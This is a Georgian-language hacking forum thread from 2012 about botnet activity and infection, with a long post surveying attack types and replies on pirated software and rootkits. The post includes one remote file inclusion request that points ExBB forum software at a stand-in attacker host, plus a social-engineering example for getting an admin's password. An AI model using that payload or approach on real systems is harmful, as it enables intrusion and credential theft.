GeoCybers Posted June 20, 2012 Share Posted June 20, 2012 ამერიკულმა კომპანიამ Unveillance-მ გამოაქვეყნა ვიდეორგოლი, სადაც ნაჩვენებია ბოტნეტების მუშაობა ერთი წუთის განმავლობაში – 2012 წლის 11 ივნისს 9:00-დან 9:01-მდე. ამ დროს არ მომხდარა არაფერი განსაკუთრებული, ეს იყო ერთი ჩვეულებრივი დღე ინტერნეტის ცხოვრებაში. რუკაზე ფერებით აღნიშნულია ბოტნეტები (botnet) : Palevo – წითელი , Ramnit – ლურჯი, Cutwall – მწვანე, Sality – ყვითელი, Ircbot – ვარდისფერი, სხვა – შავი. დსთ-ს ქვეყნებში ყველაზე აქტიური იყო Palevo, თუმცა სიტუაცია ხშირად იცვლებოდა. კომპანია Unveillance უზრუნველყობს მომხმარებლების ქსელების მონიტორინგს. ასევე შეიმუშავა ორიგონალური გადაწყვეტილება ინფიცირებული ბოტების აღმოსაჩენად. ამ ფორუმზე ვიდეო ვერ დავდე >>> და ნახეთ >>> http://geocybers.com/hack/%E1%83%91%E1%83%9D%E1%83%A2%E1%83%9C%E1%83%94%E1%83%A2%E1%83%94%E1%83%91%E1%83%98-botnet 1 Link to comment Share on other sites More sharing options...
Shopen Posted June 20, 2012 Share Posted June 20, 2012 ხო ეგ გავრცელებულია ,ეგ კი არა ქართველებსაც კი აქვს . როგორც ვიცი მილიონობით კომპია დაინფიცირებული 2 Link to comment Share on other sites More sharing options...
GeoCybers Posted June 20, 2012 Author Share Posted June 20, 2012 ეგ როგორ ხდება? როგორ აინფიცირებენ(ზომბირება)? 1 Link to comment Share on other sites More sharing options...
MaKaRoV Posted June 20, 2012 Share Posted June 20, 2012 რამე ფაილს მოყვება, მაგალითად ვინრარიდან რო ამოვიღე ერთერთი ფაილი აღარ გამოჩნდა მერე, მაგრამ ფიზიკურად არსებობდა, ეგრევეა უჩინარი ბოტნეტი-და მამაძაღლობებიც, ყველაზე მარტივია საინსტალაციოში ჩაკერება, შეიძლება თამაშს მოყვეს, ან მუსიკას, კინოს, ვიდეო, და ა.შ Link to comment Share on other sites More sharing options...
მათე Posted June 20, 2012 Share Posted June 20, 2012 აგერ ეგ ვიდეო 1 Link to comment Share on other sites More sharing options...
Shopen Posted June 20, 2012 Share Posted June 20, 2012 ეგ როგორ ხდება? როგორ აინფიცირებენ(ზომბირება)? მასობრივად გზავნიან რაიმე ბოტს შეტევების ნაირსახეობები ,,ჰაკერული შეტევა” ამ სიტყვის ვიწრო გაგებით ნიშნავს ,, უსაფრთხოების სისტემაზე თავდასხმა”-ს,იმიტომ რომ სიტყვა ,,ჰაკერმა” დროთა განმავლობაში შეიცვალა თავისი მნიშვნელობა და დამახინჯდა. ,,ჰაკერული შეტევა” ამ სიტყვის ფართო გაგებით (თავდაპირველი გაგებით) - არის გონებრივი შტურმი, რომელიც მიმართულია რთული ამოცანების ამხსნის გზებზე. ჰაკერულ შეტევაში შეიძლება მონაწიობდეს ერთი ან რამდენიმე მაღალი დონის პროფესიონალი სპეციალისტი (ჰაკერი). ამ შტურმის შედეგად შეიძლება ნაპოვნი იყოს პრობლემის გადაჭრის არატრადიციული მეთოდი, ან არსებულ მეთოდებში სერიოზული კორექტურა შეიტანონ. ,,კრეკერული შეტევა” - მოქმედება, რომლის მიზანიც არის კონტროლის მოპოვება ( ან უფლების გაზრდა) Remote ან ლოკალურ სისტემაზე, ან მისი დესტაბილიზაცია, ან მწყობრიდან გამოყვანა. თავიდან შეტევის მიზეზები იყო გარკვეული შეზღუდვები, რომელიც შეეხებოდა TCP/IP პროტოკოლს. IP პროტოკოლის ადრინდელ ვერსიებში არ არსებობდა უსაფრთხოების მოთხოვნები, რომელიც მხოლოდ რამდენიმე წლის შემდეგ გამოჩნდა. მხოლოდ ინტერნეტ-კომერციის განვითარების მერე გამოჩნდა უსაფრთხოების აქტუალური პრობლემა. Mailbombing არის ყველაზე ძველი მეთოდი შეტევის, თუმცა მისი არსი მარტივი და პრიმიტიულია: დიდი რაოდენობა მაილების ხდიან შეუძლებეს საფოსტო ყუთთან და ხშირად მთელ საფოსტო სერვერთან მუშაობას. ამ მიზნით შექმნილი იყო მრავალი პროგი, და გამოუცდელ ნუბსაც შეეძლო შეტევის მოწყობა მხოლოდ მსხვერპლის მაილის და საჭირო სპამ მაილის რაოდენობის მითითებით. ასეთი სოფტები მალავდნენ რეალურ IP-ს და ხმარობდნენ ანონიმურ საფოსტო სერვერებს.ამ შეტევის თავიდან აცილება ადვილია, რადგან პროვაიდერების უმეტესობა კარგად ფილტრავენ წერილებს. პროვაიდერს შეუძლია შეზღუდოს ერთი მომხმარებლიდან მაქსიმალური წერილების რაოდენობა და შეტევა აზრს კარგავს. Pass Hacking ეს შეტევაც ადვილია. შემტევი არჩებს პაროლს შეზღუდული დოსტუპის სისტემებისთვის. ჩვეულებრივ, მომხმარებლებს და უზერებს არ შეუძლიათ რთული სიმბოლოების და რიცხვების შემცველი პაროლების დამახსოვრება. ყველაზე ხშირად პარილი არ არის 8 სიმბოლოზე მეტი და არის ან სიტყვა, ან თარიღი. თარიღის გამოყენების დროს ყველაფერი ძალიან მარტივია, რადგან 8 ციფრი- ეს მხოლოდ (!) 100 000 000 შესაძლებელი კომბინაციაა, რომელშიც პირველი ან ბოლო 4 ციფრი აღნიშნავს წელს, ეს წლები კი მხოლოდ 1900-2050 შუალედში შეიძლება იყოს. დანარჩენი 2 ციფრი აღნიშნავენ თვეს, ანუ შეიძლება იყვნენ მხოლოდ 1 და 12- ს შორის. დარჩენილი რიხვები იღებენ მნიშვნელობებს 1- 31-ს შორის- თვის რიცხვები. აქაც შეიძლება რაღაცეების ამოკლება, მაგალითად 3102(31 თებერვალი არ არსებობს), რადგან ასეთი თარიღები გამოიყენება ძალიან იშვიათად. საშუალო ბრუტერისთვის არ არის პრობლემა პაროლის პოვნა: დაახლოებით 100 პაროლის შემოწმებისას ეს დრო დაიკავებს მაქსიმუმ რამდენიმე დღეს. ფრაზების დროს ყველაფერი გაცილებით რთულადაა, რადგან რომ ავიღოთ თუნდაც მარტო ინგლისური ალფავიტი 26 ასოსგან, ფრაზას 8 სიმბოლოსგან შეიძლება ქონდეს 208 827 064 576 (26-ის მერვე ხარისხი), რაც ათასჯერ უფრო რთულია. აქ კი გვეხმარება ჩვენი გონება: მეეჭვება რიგითმა მომხმარებელმა დაიწყოს სიმბოლოების შემთხვევითი თანმიმდევრობა პაროლად, ანუ საკმარისია გავბრუტოთ ყველა არსებული სიტყვა ინგლისურში, რომელიც 200 000 ზე მეტი არაა (ჟარგონების და იშვიათი სიტყვების ჩათვლით), ეს კი უკვე მილიონჯერ უფრო ადვილია, ვიდრე 208 827 064 576 ვარიანტის განხილვა. გარდა ამისა, თუ უფრო ყურადღებით დავფიქრდებით, ხალხის უმეტესობას, რომელიც რომელიმე სფეროში მუშაობს,გაცილებით მცირე სიტყვა აქვს თავის ლექსიკაში, რაც სავარაუდო პაროლის რაოდენობას ბევრად ამცირებს. გარდა ამისა უნდა მივაქციოთ ყურადღება იმას, რომ პაროლი შეიძლება იყოს ახლობლები, შინაური ცხოველების და ქალაქების სახელიები, რაც ბევრად აადვილებს საქმეს. მიუხედავად ამ ყველაფრისა, არ გეგონოთ, რომ პაროლის გაბრუტვა ადვილია. ზოგი უზერი ( განსაკუთრებით სისტემური ადმინისტრატორები) იყენებს პაროლად შემთხვევით თანმიმდევრობას ასოების ციფრებთან ერთად. არსებობს სანდო პაროლის შექმნის და დამახსოვრების მრავალი ხერხი. მაგალითად, ამ ფრაზის პირველი ასოებიდან ,, Hacking has changed my life very much" ვიღებთ პაროლს hhcmlvm , რომლის გაბრუტვასაც რამდენიმე ტრილიონი ვარიანტი ჭირდება. ვირუსები, ტროიანები, მაილ ვორმები, სნიფერები, Rootkit- ები და სხვა სპეციალური პროგრამები შეტევის ეს ხერხი არის ყველაზე იმპროვიზირებული. აქ ყველაფერი დამოკიდებუკია ჰაკერის გონებაზე. ეს შეტევები არის სპეციალური სოფტების გამოყენება მსხვერპლის კომპზე სამუშაოდ. ესეთი სოფტები განკუთვნილია მფლობელისთვის საიდუმლო ინფორმაციის მოძებნა / გადაცემისთვის, ან მხოლოდ სისტემისთვის ზიანის მიყენებისთვის და მისი მწყობრიდან გამოყვანისთვის. ამ პროგრამების მოქმედების პრინციპები სხვადასხვა, ამიტომ მათ აქ არ განვიხილავთ. ქსელური დაზვერვა შეტევის ეს ხერხი შედის მოსამზადებელ ეტაპში. ამ შეტევის დროს კრეკერი არაფერს არ აზიანებს, მაგრად შედეგად მას შეუძლია მიიღოს დახურული ინფორმაცია მსხვერპლის კომპის ფუნქციონირების შესახებ. მიღებული ინფორმაცია გამოიყენება მომავალი შეტევის გონიერად დაგეგმვისთვის. ასეთი დაზვერვის დროს ჰაკერმა შეიძლება დაასკანეროს პორტები, DNS - მოთხოვნები, ღია პორტების დატესტვა ექოს პრინციპით, პროქსი სერვერების რაოდენობა და დაცვის დონე. შედეგად შესაძლებელია ინფორმაციის მიღება სისტემაში არსებულ DNS-მისამართებზე, ვინ ეკუთვნიან ისინი, რომელი სერვისებია მათზე ხელმისაწვდომი, დოსტუპის დონე ამ სერვისებთან შიდა და გარე მომხმარებლებისთვის. პაკეტების სნიფინგი. ასევე ძალიან გავრცელებული შეტევის ხერხი, რომელიც დაფუძნებულია ქსელის კარტის მუშაობის რეჟიმზე ,,promiscuous mode”. ამ რეჟიმში ყველა ის ინფორმაციული პაკეტი, რომელსაც ქსელის კარტა იღებს, გადაეცემა განხილვისთვის სპეციალურ გადამამუშავებელ პროგს. შედეგად ბოროტმოქმედმა ( სტატიის ავტორი Blackhat-ებს გულისხმობს ბოროტმოქმედში ) შეიძლება მოიპოვოს დიდი რაოდენობით დაფარული ინფორმაცია: ვინ საიდან სად გადასცემდა პაკეტებს, რომელ მისამართებს გადიოდნენ ეს პაკეტები და ა.შ. ყველაზე საშიში ამ შეტევაში ისაა, რომ მან (კრეკერმა) შეიძლება ხელში ჩაიგდოს ისეთი ინფორმაცია, რომლითაც ის შეძლებს უკანონოდ შეღწევას სისტემაში ჩვეულებრივი თანამშრომლის ლოგინ-ს ამოფარებული. (ინფორმაციაში იგულისხმება ლოგინები, პაროლები და ა.შ. ) IP - სპუფინგი ასევე შეტევის გავრცელებული შესაძლებლობა. გამოიყენება არასაკმარისად დაცულ ქსელებში, როცა ბოროტმოქმედი წარმოაჩენს თავს, როგორც დასკანირებულ მომხმარებელს, და ამ დროს არის ან თვითონ ორგანიზაციაში, ან მის ფარგლებს გარეთ. ამისთვის კრეკერმა უნდა ისარგებლოს იმ IP- ით, რომელიც ნებადართულია ქსელის უსაფრთხოების სისტემაში. ესეთი შეტევა შესაძლებელია, თუ უსაფრთხოების სისტემა ახდენს მომხმარებლის მხოლოდ IP-ის იდენტიფიკაციით და არ ითხოვს დამატებით დადასტურებებს. Man-in-the-Middle შეტევის ხერხი, როცა კრეკერი ახდენს 2 სისტემას შორის კავშირის არხის გადამისამართებას თავისკენ, და იღებს დოსტუპს ყველა გადაცემულ ინფორმაციასთან. ასეთ დონის ინფორმაციაზე დოსტუპის მიღების შემდეგ კრეკერს შეუძლია ინფორმაციის მისთვის საჭირო გზით მოდიფიცირება, რათა მიაღწიოს საკუთარ მიზანს. ამ შეტევის მიზანია გადაცემული ინფორმაციის ფალსიფიცირება და მოპარვა, ანდა დოსტუპის მიღება ქსელის რესურსებთან. ასეთი შეტევებისთვის ყურადღებისდევნება საკმაოდ ძნელია, რადგან ჩვეულებრივ, ბოროტმოქმედი, არის ორგანიზაციის შიგნით. მაგალითი (!) : მაგალითად ობიექტმა A- მ უნდა გადასცეს გარკვეული ინფორმაცია ობიექტ B-ს. ობიექტი C კი არის კრეკერი. ობიექტი C წარუდგენს ობიექტ A- ს თავის თავს, როგორც ობიექტი B, ბოლო ობიექტ B-ს, როგორც ობიექტი A. შედეგად, როცა ობიექტი A უგზავნის ობიექტ B-ს რამე ინფორმაციას, იგი სინამდვილეში ამ ინფორმაციას ობიექტ C-ს გადასცემს, თუმცა გონია, რომ ეს ობიექტ B-ს გადასცა. ობიექტი C იღებს ამ ინფორმაციას, ცვლის ისე, როგორც მას სურს, და გადასცემს ობიექტ B-ს. ობიექტ B-ს გონია, რომ ინფორმაცია მიიღო ობიექტი A-გან, ანუ ყველაფერი წესრიგშია =) ინექცია შეტევა, რომელიც დაკავშირებულია ინექციის სხვადასხვა მეთოდებთან, წარმოადგენს მუშა სისტემაში სხვადასხვა ბრძანებების ან მონაცემების შეყვანას (ინექციას), სისტემის მუშაობის შესაცვლელად. შედეგად - ჰაკერი იღებს დოსტუპს დახურულ ფუნქციებთან და ინფორმაციასთან, ანდა მთლიანი სისტემის მუშაობის დესტაბილიზაციას. ყველაზე პოპულარულია ეს შეტევა ინტერნეტის ქსელში, თუმცა ასევე შესაძლებელია მოხდეს სისტემის DOS-იდანაც. ( არ ვიცი DOS ქართულად როგორაა, საკომანდო ხაზი? ) . SQL- ინექცია - შეტევა, რომლის დროსაც ცვლიან SQL- ის მოთხოვნების პარამეტრებს მონაცემთა ბაზაში. შედეგად მოთხოვნა იღებს სრულიად სხვა სახეს, და შემომავალი მონაცემების არასაკმარისი ფილტრაციის შემთხვევაში შეუძლია არამხოლოდ კონფიდენციალური ინფორმაციის გამოტანა, არამედ შეცვლა / წაშლაც. ძალიან ხშირად შეტევის ასეთი ხერხი შეიძლება ვნახოთ ისეთი საიტების მაგალითზე, რომლების იყენებენ DOS-ის პარამეტრებს (მოცემულ შემთხვევაში - URL) SQL- მოთხოვნების მონაცემთა ბაზისთვის გადაცემას ყოველგვარი დამატებითი შემოწმების გარეშე. PHP- ინექცია - ერთ-ერთი ხერხი ვებ-საიტების გასატეხად, რომლების PHP-ზე მუშაობენ. მისი არსი იმაშია, რომ , რომ შეიყვანოს სპეციალურად ფორმირებული სცენარი ვებ- სოფტის კოდში საიტის სერვერის მხარეზე, რასაც მივყავართ მოთხოვნილი ბრძანებების შესრულებამდე. ცნობილია, რომ მრავალ, ინტერნეტში გავრცელებულ უფასო დვიჟოკებში და ფორუმებში, რომლების მუშაობენ PHP- ზე( ყველაზე ხშირად ესენია მოძველებული ვერსიები). ასეთ დვიჟოკებზე არის ხოლმე ბოლომდე არ განხილული და ბოლომდე არ გათვლილი მოდულები, ან ცალკეული კონსტრუქციები ხვრელებით. ჰაკერები ასეთ ხვრელებს უკეთებენ ანალიზს, და მათი კარგად დამუშავების შემდეგ იღებენ სასურველ ინფორმაციას მაგალითი (!). ფორუმში ExBB არის უძველესი დირკა, რომელიც გამოიყენება ჰაკერების მიერ შემდეგი მოთხოვნით : GET //modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? . Cross Site Scripting ანუ XSS - დირკების ტიპი, რომელიც ჩვეულებრივ არის ვებ-სოფტებში, რომელიც აძლევს ჰაკერს საშუალებას შეიყვანოს კოდი იმ გვერდებში, რომელსაც სხვა მომხმარებლების ნახულობენ. ასეთი კოდის მაგალითებია HTML კოდი და სკრიპტები, რომლების სრულდება კლიენტის მხარეზე, ყველაზე ხშირად კი JavaScript . სხვა სახელებია ამ შეტევის - CSS , ან სკრიპტული ინექცია. მაგალითი (!) ქვემოთ მოყვანილი მაგალითი ავიღე სტატიიდან ,, TBC , თიბისი ბანკი” (დაწერილია micr0 - მიერ ) ოდნავ შევცვალე ტექსტი და მოვარგე სტატიას. დიდი მადლობა micr0-ს . სააავტორო უფლებები დაცულია თბს- ბანკის ბაგი (by micr0) XPath-ინექცია - ხვრელების ტიპი, რომლის აზრიც არის XPath - გამოთქმების შეყვანა ორიგინალურ მოთხოვნაში. ეს ხდება XML მონაცემთა ბაზაში. როგორც სხვა ინექციების დროს, ხვრელი გამოყენებადია მაშინ, როცა ხდება შემავალი მონაცემების არასაკმარისი გაფილტვრა სოციალური ინჟინერია სოციალური ინჟინერია არის რაიმე ოფისში ან ორგანიზაციაში მომსახურე პერსონალის არაპროფესიონალიზმის, არაკომპეტენტურობის ან უგულისყურობის გამოყენება, რათა მივიღოთ დოსტუპი სასურველ ინფორმაციასთან. ეს მეთოდი ჩვეულებრივ გამოიყენება კომპიუტერის გარეშე, ჩვუელებრივი ტელეფონის, მიწერ-მოწერის ან სულაც, 1 კათხა ლუდის დახმარებით. =) ამგვარად მიიღება სრულად განსხვავებული ინფორმაციები. ასეთი შეტევის დროს ბოროტმოქმედი ახდენს დაკავშირებას მსხვერპლთან. შემდეგ ან აბნევს მას, ან აღწევს იმდენს, რომ მსხვერპლი მას ენდობა. ამის შემდეგ ცდილობს მიიღოს აუცილებელი ინფორმაცია, რომლის სხვა გზებით მიღება საკმაოდ რთულია, რადგან სხვა გზები გარკვეულ რისკთან არის დაკავშირებული. როგორც ძველი ანდაზა ამბობს, ,,ყველაზე სუსტი რგოლი უსაფრთხოების სისტემაში არის თვითონ ადამიანი ". მაგალითად (!). მე მინდა დავჰაკო რამე საიტი. ეს საიტი არის საკმაოდ დაცული. მე ვადგენ,ვინ არის ადმინი. გვარი, სახელი, მისამართი და ა.შ. ,ვადგენ მის ჰობის. მაგალითად, იგი თამაშობს რამე ონლაინ თამაშს. მე ვეკონტაქტები ადმინს, შევდივარ დავერიეში, საერთო სასაუბრო თემაც ნაპოვნია - ის ონლაინ თამაში. შემდეგ მიდის ბაზარი ცხოვრებაზე, რამდენი ხანია კომთან ზიხარ და ეგეთები. ვიგებთ, რომ აქვს საიტი =). რადგან უკვე ჩვენი მეგობარია, ვეკითხებით, რა არის მისი საყვარელი პაროლი იმ თამაშის ანგარიშებზე, ისიც დაუბრკოლებლად გვეუბნება, რადგან ჩვენი მეგობარია . და ა.შ. ამ დარგში იმპროვიზაცია ძალიან აუცილებელია. Denial of Service DoS შეტევის მიზანია აიძულოს მსხვერპლი კომპიუტერი უარი თქვას მომხარებლებთან ურთიერთობაზე. შეტევის ამ ტიპის მიზანი არ არის (!) რაიმე ტიპის დაფარული ინფორმაციის მიღება, მაგრამ ხანდახან არის გარკვეული სახით, ნიადაგის მომზადება სხვა შეტევებისთვის. მაგალითად, ზოგიერთ სოფტს მისი პროგრამული შეცდომების გამო შეუძლიათ გამოიწვიონ განსაკუთრებული სიტუაციები, და სერვისების გათიშვის შემდგომ შეუძლიათ შეასრულონ ის ბრძანებები, რომელიც მათ ჰაკერმა მისცა, ან შეიძლება მოხდეს სერვერზე ერთგვარი ზვავური შეტევა, როცა სერვერს არ შეუძლია უამრავი შემავალი პაკეტის მიღება და ითიშება გადატვირთვის გამო. ამ დროს ითიშება ბევრი დაცვის სისტემაც. Distributed Denial of Service DDoS არის DOS შეტევის ერთ-ერთი სახე. აქვს იგივე მიზნები,რაც DOS შეტევას, თუმცა განსხვავებით მისგან, ხდება არა 1, არამედ რამდენიმე კომპიუტერიდან ერთდროულად. შეტევის ამ ტიპის დროს ხდება ან შეცდომების გამოწვევა, რომელსაც მივყავართ სისტემის გამორთვამდე, ან დაცვის ტყუილად ჩართვა, რაც თავისთავად სისტემას ბლოკავს და სისტემაც ითიშება. DDOS გამოიყენება იქ, სადაც ჩვეულებრივი DOS არაეფექტურია. ამისთვის რამდენიმე კომპი ერთიანდება, და თითოეული მათგანი ახდენს ერთდროულ DOS შეტევას მსხვერპლზე. ამას ერთად ქვია DDOS შეტევა. ( სხვათაშორის, სწორედ ამ მეთოდით გატეხეს აგვსტოში რუსებმა საქართველოს მთავრობის საიტები. ისინი ტვირთავდნენ ტრაფიკს, საიტები ვერ უძლებდნენ და ითიშებოდნენ). ნებისმიერი შეტევა არის მხოლოდ და მხოლოდ მცდელობა გამოიყენოს მსხვერპლის უსაფრთხოების სისტემის არასრულყოფილება ან დაფარული ინფორმაციის მისაღებად, ან სისტემის დასაზიანებლად, ამიტომ ყველა წარმატებული შეტევის მიზეზი არის ჰაკერის პროფესიონალიზმი და ინფორმაციის მნიშვნელობა, ამასთანავე სისტემური ადმინისტრატორის არაკომპეტენტურობა და არასრულყოფილი პროგრამული უზრუნველყოფა. ესეც ბოტნეტზე http://itmania.ge/archives/1164 2 Link to comment Share on other sites More sharing options...
Mamuka Antadze Posted June 21, 2012 Share Posted June 21, 2012 ესეც ბოტნეტზე http://itmania.ge/archives/1164 ვა ჩემი საიტი :) 1 Link to comment Share on other sites More sharing options...
Shopen Posted June 21, 2012 Share Posted June 21, 2012 ვა ჩემი საიტი პირველად გეობაზა.ნეტ არ იყო? 2 Link to comment Share on other sites More sharing options...
GeoCybers Posted June 21, 2012 Author Share Posted June 21, 2012 აიტიმანიაზე კარგი პოსტები იდება... მაგრამ ახლა იშვიათად, რატომრაც! :sa: Link to comment Share on other sites More sharing options...
Shopen Posted June 21, 2012 Share Posted June 21, 2012 აიტიმანიაზე კარგი პოსტები იდებოდა... მაგრამ ახლა იშვიათად, რატომრაც! 2 Link to comment Share on other sites More sharing options...
fashisti Posted June 21, 2012 Share Posted June 21, 2012 საქართველოში მხოლოდ თბილისი ანათებდა და ვერ გავიგე 1 წუთი როგორ იყო 4 წუთზე მეტი გამოვიდა მე რაც ვნახე... 1 Link to comment Share on other sites More sharing options...
Mamuka Antadze Posted June 21, 2012 Share Posted June 21, 2012 პირველად გეობაზა.ნეტ არ იყო? კი აიტიმანიაზე კარგი პოსტები იდება... მაგრამ ახლა იშვიათად, რატომრაც! mouclelobis bralia megobaro 1 Link to comment Share on other sites More sharing options...
GeoCybers Posted June 21, 2012 Author Share Posted June 21, 2012 kargi postebi ideba! yoveldgiuri stumari var!!!!!!!!!!!!! Link to comment Share on other sites More sharing options...
official Posted June 22, 2012 Share Posted June 22, 2012 მე როგორც გავიგე თუ 667 პორტი გაქვს განსნილი ესეიგი დაინფიცირებულია კომპიუტერი, შეიძლება ვცდები Link to comment Share on other sites More sharing options...
Shopen Posted June 22, 2012 Share Posted June 22, 2012 მე როგორც გავიგე თუ 667 პორტი გაქვს განსნილი ესეიგი დაინფიცირებულია კომპიუტერი, შეიძლება ვცდები არა მთლად ეგრე არ არის მაგის გულისტVის პორტები არ უნდა დახურო ჩემი აზრით ,ქართულ ქსელში ჩართულ კომპებს არ აქვთ ისეთი საშიშროება მგონი თორე აქამდეც გამოაცხადებდნე კიბერ უსაფრთხოებიდან:D Link to comment Share on other sites More sharing options...
kid Posted June 26, 2012 Share Posted June 26, 2012 კონკრეტულად პორტი 667 არაფერ შუაშია, სხვა პორტებზეც შეიძლება გაკეთება ბოტნეტის აღმოსაჩენად საკმაოდ სკრუპულოზური ექსპერტიზა უნდა ჩაუტარდეს კომპს, ერთი პორტის შემოწმება არ უშველის რაც შეეხება საქართველოს, ნუ გგონიათ, რომ რადგანაც პატარა ქვეყანაა - ნაკლებია რისკი შპიონაჟისთვის განკუთვნილი ტროიანით დაინფიცირების ან ბოტნეტში/სპამნეთში მოხვედრის პირატული პროგრამები ხელს უწყობენ ბოტნეტების გავრცელებას - რო ჩამოქაჩავ პროგრამას და keygan-ს რო გაუშვებ, სავარაუდოდ რამეს აიკიდებ კიდეც ზოგიერთ შემთხვევაში, რატომ არ არის კიგანები მოცემული ტექსტურ ფაილში და რატომ არის მოცემული .exe ფაილად? იმიტომ რომ executable ფაილის გაშვებით ინფიცირდებით კიდეც ამას გარდა, პირატული XP არის რუთქითების გავრცელების უპირველესი წყარო (ოპერაციულ სისტემას თავიდანვე აქვს ჩაწერილი რუთკითი, რომელიც ინიღბება ლეგიტიმურ პროგრამად), შეიძლება ითქვას, მავნე პროგრამებიდან რუთკითის პოვნა ყველაზე რთულია ოპერაციულ სისტემებში რუთკითების გავრცელების 75% მოდის (პირატულ) XP-ზე კონკრეტულ მაგალითებს რაც შეეხება, ქართულ კომპიუტერებზე (ძირითადად საჯარო დაწესებულებების კუთვნილ კომპიუტერებზე) შპიონაჟს ახორციელებდა Georbot ბოტნეტი. Eset-მა გამოაქვეყნა ამაზე კვლევა და თუ გინდათ დაგუგლეთ თუ მოვიცალე ჩემს ბლოგზე დავწერ ქართულად Link to comment Share on other sites More sharing options...
fashisti Posted June 27, 2012 Share Posted June 27, 2012 (ძირითადად საჯარო დაწესებულებების კუთვნილ კომპიუტერებზე) ამას რაც შეეხება ეგ არაპროფესიონალი ადმინების ბრალია და არა რამე არალიცენზირებული სოფტის... საერთოდ მე რასაც ვამჩნევ ყველას ფეხებზე კიდია ყველაფერი მთავარია რაღაცამ იმუშაოს ანუ ხალხმა მაგაში ფული გადაიხადოს და ეგ როგორ მუშაობს მაგი არავის აღელვებს და თავსაც არავინ იწუხებს... ელემენტარულად აიტი სკოლაში ყველა კომპიუტერი გატენილია ვირუსებით და იმდენს ვერ ახერხებენ რომ თავისი კომპები ვირუსებისგან დაიცვან ხოდა სხვას რა უნდა მოუხერხონ ნეტა... (თანაც ამ დაცვას არანაირი ფინანსები არ ჭირდება უბრალოდ ყველაფრის სწორად დაკონფიგურირებაა საჭირო) Link to comment Share on other sites More sharing options...
GeoCybers Posted June 27, 2012 Author Share Posted June 27, 2012 სკოლაში ყველა კომპიუტერი გატენილია ვირუსებით ჩემს სკოლაში კომპს მე ვწმინდავ! ...და რაღაცეებსაც ;) 1 Link to comment Share on other sites More sharing options...
Recommended Posts